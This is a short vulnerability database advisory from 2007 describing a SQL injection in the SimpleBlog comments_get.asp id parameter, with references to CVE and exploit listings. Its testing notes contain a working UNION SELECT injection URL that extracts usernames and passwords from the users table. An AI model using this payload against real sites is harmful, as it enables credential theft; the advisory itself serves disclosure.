SimpleBlog comments_get.asp id Variable SQL Injection

2007-07-28T00:00:00
ID OSVDB:37268
Type osvdb
Reporter OSVDB
Modified 2007-07-28T00:00:00

Description

Manual Testing Notes

comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS'

References:

ISS X-Force ID: 35677 Generic Exploit URL: http://www.milw0rm.com/exploits/4239 FrSIRT Advisory: ADV-2007-2694 CVE-2007-4055 Bugtraq ID: 25123